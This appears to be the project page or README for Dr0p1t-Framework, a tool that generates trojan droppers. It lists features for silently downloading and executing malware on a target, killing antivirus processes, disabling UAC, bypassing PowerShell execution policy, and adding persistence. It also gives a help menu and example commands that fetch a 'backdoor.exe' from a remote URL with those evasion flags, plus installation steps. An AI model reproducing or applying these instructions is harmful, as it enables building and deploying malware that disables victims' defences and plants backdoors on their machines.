Dr0p1t-Framework 1.2 - A Framework

Have you ever heard of Trojan droppers?

In short, this type of trojan downloads other malware, and Dr0p1t gives you the chance to create a dropper that will bypass some AV products with a few tricks.

Features 
  • Framework works with Windows and Linux
  • Downloads an executable on the target system and executes it silently
  • The executable size is small compared to other droppers generated the same way
  • Self-destruct function so that the dropper will kill and delete itself after finishing its work
  • Adding the executable to startup after downloading it
  • Adding the executable to the task scheduler after downloading it (UAC does not matter)
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • When running PowerShell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Help menu 
Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x and the recommended version for Python 3 is 3.5.x; do not use 3.6 because it is not yet supported by PyInstaller.
  • The Python library requirements in requirements.txt

Dependencies required for Linux
  • wine
  • Python 2.7 on the Wine machine
Note: you must have root access.

Installation
If you are using Linux:

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are using Windows, download it and then do the following:
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Tested on:
  • Kali Linux - SANA
  • Ubuntu LTS 14.04-16.04
  • Windows 10 / 8.1 / 8
